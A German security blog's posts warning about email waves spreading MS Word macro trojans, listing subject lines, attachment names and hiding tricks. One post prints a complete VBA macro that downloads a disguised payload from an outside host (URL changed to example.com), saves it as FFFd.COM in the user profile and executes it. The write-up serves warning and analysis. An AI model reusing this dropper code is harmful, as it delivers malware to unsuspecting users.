Neuer MS-Word Trojaner

Erste Seite des MS-Word Trojaners
Erste Seite des MS-Word Trojaners
Heute habe ich zahlreichen E-Mails mit einem neuen MS-Word Trojaner erhalten. Entweder konnte ich das Dokument direkt herunterladen, oder es war in einer Zip-Datei eingebunden. Die älteste E-Mail ist von heute 8:32 MESZ.

Betreff Zeilen sind beispielsweise:

  1. The answer from the forum id 56681472642
  2. Re: Erforderliche Dokumentation #454012
  3. Die Anfrage ist erfolgreich abgeschlossen

Die Nummern können dabei durchaus variieren. Auch wird die Schadsoftware über zahlreiche gehackte Server bereitgestellt.

Die Dateien heißen Dokumentation.zip, Abschluss.Doc, oder Die_Anforderung.zip. Teilweise wird dem Downloadlink auch die E-Mailadresse des Adressaten angefügt. Z.B. …/Dokumentation.zip?posnmaster@example.com. Die Datenbank der E-Mail-Adressen, die die Kriminellen verwenden, ist sehr schlecht. Für eine meiner Domains werden Adressen genutzt, die ich nie verwendet habe. Wie hier zu sehen posnmaster statt postmaster.

Sichtbar gemachter Beginn des Programmcodes des Trojaners.
Sichtbar gemachter Beginn des Programmcodes des Trojaners.

Das Word-Dokument enthält Hinweise, wie der Empfänger die Makro-Sicherheit ändern muss, damit der Trojaner funktioniert. Netter Trick. Im hinteren Teil ist der Code des Programms als Text eingetragen, allerdings in weißer Schrift auf weißem Grund, so dass der Programmcode auf den ersten Blick nicht erkennbar ist. Das Dokument scheint nur unsinnig viele leere Seiten zu enthalten.

Die Subroutinen des Trojaners ist stärker obfuskiert als bei den bisherigen Makro_Trojaner. Sogar der Text des Dokumentes wird am Ende geändert. Im Kern wird recht umständlich nach einem Marker „XsTSveotalxVWX“ gesucht, der den Beginn des Programmcodes kennzeichnet. Anschließend wird der Code in eine Datei im Userprofile – in einem Fall hgZWJKrXclYjI.exe – gespeichert und anschließend ausgeführt. Einige Seiten werden bereits als gefährliche Seiten erkannt. Die meisten Antiviren-Programme erkennen die Dateien und die Server immer noch nicht als Schadsoftware oder als befallene Seiten.

Hier geht es zu einem Report bei Virustotal.

Gute Nacht.

Trojaner: Keine Minute vergeht in der ich nicht an dich denke

oder ähnlich lauten die Betreff Zeilen einer derzeit laufenden Welle zur Verbreitung von Trojanern. Der Text beschränkt sich auf ein oder zwei Sätze, wie:

Keine Minute vergeht in der ich nicht an dich denke, und darum schenke ich dir meine Liebe, denn ich spür, ich gehör einfach zu dir. Ich lieb dich!

D. Bischof

Angehängt ist ein ZIP-Archiv 4180.zip, in dem sich wiederum ein MS-Word Dokument abactinal642.doc mit einem Makro befindet. In diesem Fall ist nur leicht obfuskiertes Makro, das eine als Bild getarntes Programm als FFFd.COM im Profil des Nutzers abspeichert und aufruft. Den Link im Quelltext habe ich geändert, er funktioniert bereits nicht mehr.

Sub hui()
Dim DMtjPKZbDiINOsDjnWMDQUaGD As String
Dim vNFhXFNV_TueQRFNXVYWLqYTecVHXURZUNBDUyA As Integer
URL = "http://www.example.com/fotos/rollover5.jpg"
DMtjPKZbDiINOsDjnWMDQUaGD = Environ("USERPROFILE")
Dim lOMwCMuTOYqPBHJNCl: Set lOMwCMuTOYqPBHJNCl = CreateObject("Microsoft.XMLHTTP")
Dim CSGDWYMVOOBASEd: Set CSGDWYMVOOBASEd = CreateObject("Adodb.Stream")
lOMwCMuTOYqPBHJNCl.Open "GET", URL, False
lOMwCMuTOYqPBHJNCl.Send
With CSGDWYMVOOBASEd
.Type = 1
.Open
.write lOMwCMuTOYqPBHJNCl.responseBody
.SaveToFile DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM", 2
End With
Shell DMtjPKZbDiINOsDjnWMDQUaGD & "\FFFd.COM"
End Sub

Trojaner: MS Word Anhänge

Die MS-Word Dokumente scheinen sich einer neuen Beliebtheit als Viren und Trojanerschleuder zu erfreuen. Heute fand ich zwei E-Mails mit einer anderen Variante im Postfach. Der Text der E-Mails ist minimal: „Trojaner: MS Word Anhänge“ weiterlesen